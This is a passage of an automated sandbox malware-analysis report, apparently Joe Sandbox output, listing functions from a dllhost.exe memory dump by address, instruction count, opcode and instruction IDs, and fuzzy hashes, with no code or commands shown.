                                                    • Opcode ID: 10674e2f64c33fa7e3833f89c7e1f2b99cfc496dafe5d35a37d8e00ca63a1fa0
                                                    • Instruction ID: fba3d9c7d59fe45a7c52fbcc5acf462bca5bb5dd9c218c6d12c23138404bce03
                                                    • Opcode Fuzzy Hash: 10674e2f64c33fa7e3833f89c7e1f2b99cfc496dafe5d35a37d8e00ca63a1fa0
                                                    • Instruction Fuzzy Hash: 2D724830B0D90D8FEF68DB58886967873D1FF98300F1606B9D55EC32E6DE28AD428791
                                                    Function 00007FFD9B8A0D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 986523e85d384baf077c6d057621140505e32d9c2e61a0c46c3ff74232a01892
                                                    • Instruction ID: 1f235061a32e8bfbeab9eb934ed3aa07ccca662f5a81fd2e591db49a358e1b1d
                                                    • Opcode Fuzzy Hash: 986523e85d384baf077c6d057621140505e32d9c2e61a0c46c3ff74232a01892
                                                    • Instruction Fuzzy Hash: A7911475A18A8D8FD78CDB6888697A9BFE0FF9A300F4002BAD149C72D6DF781415C341
                                                    Function 00007FFD9B8A0908 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: 210e505ad8a15a290c8bb7e76061359f052a42d1b0eb4f84d8273469720aae5a
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: 8621B43130D8184FE768EB5CE88AEB977D1FB9932171505BAE58AC7136E911EC8287C1
                                                    Function 00007FFD9B8A0998 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ed71990e7fc0b7895d3c19f40ff55dfe0fa2eaad7738266f10755bdfac0b93a
                                                    • Instruction ID: 5f4c08779016c0ffba6e768d0fc22e8d233d68fc78c990bfa78addaae7a33dc6
                                                    • Opcode Fuzzy Hash: 4ed71990e7fc0b7895d3c19f40ff55dfe0fa2eaad7738266f10755bdfac0b93a
                                                    • Instruction Fuzzy Hash: 5A212820B2D91D0FE758B76C546A67977D2EF9D311F0200B9E44EC32FBDD25AC424295
                                                    Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22f75cfe707688c3fc6b09a94c0781057586c2862839006aad1ab9cacd7b5d03
                                                    • Instruction ID: 52d2c46fac1b812962deb644ca80a719cada619db946ac330d208d4ae9e7e26f
                                                    • Opcode Fuzzy Hash: 22f75cfe707688c3fc6b09a94c0781057586c2862839006aad1ab9cacd7b5d03
                                                    • Instruction Fuzzy Hash: 72212936B1D29D8BE712ABB8AC650EC7B60EF46325F0542F3D05CCB1D3D938264697A1
                                                    Function 00007FFD9B8A2801 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24c6abc9a2651a25380c0c147093acb00979e800969820fb959a3500b04809ee
                                                    • Instruction ID: c0fa296f841cf2996f7885e41102f010c593514a2a4de6188c2611751f35750a
                                                    • Opcode Fuzzy Hash: 24c6abc9a2651a25380c0c147093acb00979e800969820fb959a3500b04809ee
                                                    • Instruction Fuzzy Hash: 73118131B1D90E4AEBB8EBD898A16FCB291FF4C711F410176D50ED32A2DE28AA448750
                                                    Function 00007FFD9B8A08F8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 762470e8f54c1536944a8fb5487c0ab36a5c38124221818847e2cb0bce6ec901
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: D1012432B0E92C0B9638925D984A939B3C2EB9AB303161239D88EC3265CC10BC2343D0
                                                    Function 00007FFD9B8A0C38 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0f3a2e6b7d622ba9d92053fe9607164c0d444952ba6654715e721d5df87539a
                                                    • Instruction ID: 5bf5e54322165201e895d3914d603c5d7230567d327d92087220da53f832d332
                                                    • Opcode Fuzzy Hash: a0f3a2e6b7d622ba9d92053fe9607164c0d444952ba6654715e721d5df87539a
                                                    • Instruction Fuzzy Hash: 2311A331B1E68D8FE7129BB498601A87BA0EF56714F0645F3C048DB1A2D938260587A0
                                                    Function 00007FFD9B8A0C40 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e53ac00640a6fdaa0dd58d6fe08a1b1d1abd1252192298d23c5833839474fe51
                                                    • Instruction ID: 205cb1b1e1352d129a7e4c357c1d1c9a334578d23a115ada5e3ee4b0f1de9182
                                                    • Opcode Fuzzy Hash: e53ac00640a6fdaa0dd58d6fe08a1b1d1abd1252192298d23c5833839474fe51
                                                    • Instruction Fuzzy Hash: F211A131E1E68D8FE712DBB498601A87BB0EF56714F0645F7C048DB1A2D93826498B60
                                                    Function 00007FFD9B8A28A9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a59139b4fa50f37d3c4eb704d72ff2a1445cb3282e9e41b005622304a19509b
                                                    • Instruction ID: dcd5b20387d01e03be0647cc81a8e5390a7bcaf8db1d48a8cba80f68d9a8a508
                                                    • Opcode Fuzzy Hash: 9a59139b4fa50f37d3c4eb704d72ff2a1445cb3282e9e41b005622304a19509b
                                                    • Instruction Fuzzy Hash: 6B01A721B1A50E8BEF74EFE8C5646B86392DF9C701F064175E40EC32F6DD28AE418750
                                                    Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3baa0fd3b89923080fe375828d0efb6508c39452176d7964fe174cfe9177575
                                                    • Instruction ID: a9b3a887819165268ad6f8baf53c57a8ddb06e6387f9d565c2618cb44d6cae11
                                                    • Opcode Fuzzy Hash: e3baa0fd3b89923080fe375828d0efb6508c39452176d7964fe174cfe9177575
                                                    • Instruction Fuzzy Hash: 81019E31E1E28D9FD712DBB488A05987FB0EF56714F0641F7D048DB2A2E9386B45CBA1
                                                    Function 00007FFD9B8A4EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f2e46f9d0008eb9745fdde3dd0f50d083c70bbb01a150aebdf52cf998ba7924
                                                    • Instruction ID: 7c721453261d4a0a52bcb7983eda40b66f6f28c471d31a34ef494931ee1e0439
                                                    • Opcode Fuzzy Hash: 9f2e46f9d0008eb9745fdde3dd0f50d083c70bbb01a150aebdf52cf998ba7924
                                                    • Instruction Fuzzy Hash: C3017C35908A58CFCB59EB18C895A9573F0FB68310F05069AD409D72A0DB34AE41CF80
                                                    Function 00007FFD9B8A0C50 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d08f1ef8aac6ea9a86298ae160fbec09b8dea38b569e48255617196217dd06d7
                                                    • Instruction ID: 5f16ba0dcd92f4d5650a9cfdbe92dde835d7ef81c8fb8c0f36682988334491e6
                                                    • Opcode Fuzzy Hash: d08f1ef8aac6ea9a86298ae160fbec09b8dea38b569e48255617196217dd06d7
                                                    • Instruction Fuzzy Hash: 0D01BC30E1E28D9FE712DBB488A00A87FB0EF0A304F0541F3C048CB2A2E9382B448760
                                                    Function 00007FFD9B8A291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 826f50f3cacdf3c0d731eb89a82adcdea244b29063993d334494707c1180ded0
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: 86F03130B1A50E8BEB78EB94C9A47F87361EB58701F1141B9D40E922A1DE786A84CB50
                                                    Function 00007FFD9B8A0B77 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56c121befca67104204b85e0a5362c28ae21ab1320efdf70c71b9cafb3bbcdc9
                                                    • Instruction ID: d7a77f2a565d9d24e77554a581e847371c06b3448703a9535c9c3446e2c87f37
                                                    • Opcode Fuzzy Hash: 56c121befca67104204b85e0a5362c28ae21ab1320efdf70c71b9cafb3bbcdc9
                                                    • Instruction Fuzzy Hash: 0AF0E53525F689CFD741AB38C8A16D8BFA0EF03205F4A12EAC489C7563D215585DCB01
                                                    Function 00007FFD9B8A28F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: d0d841216224c24e31aafc01beb911f6bda16a69600d2b7edc63739f60196fed
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 2EF03020B1A50E47EBB8DBD4C9A46B87351EF58701F054275D84D972B2CD29AA458650
                                                    Function 00007FFD9B8A708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 158d809db8edd7987cf24ab55be1ce8c1b221f46639481c096f75355796bfa44
                                                    • Instruction ID: 08c174e09a118c1591dc6810c231f2bae4a61c6c2b991266c82deb3fc7369cc8
                                                    • Opcode Fuzzy Hash: 158d809db8edd7987cf24ab55be1ce8c1b221f46639481c096f75355796bfa44
                                                    • Instruction Fuzzy Hash: B0E0EC11B5E55906F7A8A3A848363B85086EB9D704F4A41B9A05DD32D3EC48298042A2
                                                    Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: f3a4e5aeb1836b2a4260cf3c141a3a384f9f6e96ac89cde6f0dd8cc824f441ce
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: 0AC04C05F6B61F41F83573EE98660ACA1406BDDF14FDB1172D64D500E1AC4D22D94177
                                                    Function 00007FFD9B8A0848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: 11d19dd3e581d1e91ccc2dcdb25a179f78747457a8a6d8949f09939fe7349d17
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: A0C08C3061180C8FC948EB28C88480833A0FB0D300BC20090E009C7170E269DCC1CB40
                                                    Function 00007FFD9B8A4015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d234ed9e9c73325d78cd355287794ced1d2512a54a3c4f78037c4d5180e2f428
                                                    • Instruction ID: f33a2f449ea43e871e3621f3ca296d8f932ec927f245a291e00afe9c231b5a40
                                                    • Opcode Fuzzy Hash: d234ed9e9c73325d78cd355287794ced1d2512a54a3c4f78037c4d5180e2f428
                                                    • Instruction Fuzzy Hash: C1C04C41F1D82A06F35DB3549431ABE44539B84644F9504B5E52ED72CECD9C9A4202DB
                                                    Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: aa8bad98628186bfa868886295a5411851ae23bdba48697ee72065a944ccb069
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: ADB01200D6740F00E42433FA08A20A470806B4C300FCA1070D40D50091E84D22980263

                                                    Non-executed Functions

                                                    Function 00007FFD9B8A09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: db32c71f2dc8cf412adbdc386a590d11a2a142c48755aac079f36003fe0511ce
                                                    • Instruction ID: ef932dab3bd6df56771be6d5020081180351a45b4128cc6966445fbfd2b2fe27
                                                    • Opcode Fuzzy Hash: db32c71f2dc8cf412adbdc386a590d11a2a142c48755aac079f36003fe0511ce
                                                    • Instruction Fuzzy Hash: AA418E47B1A47A85E31E37FD79299FC6B44CF85339B0843B7E05E8A0D75C88608792E5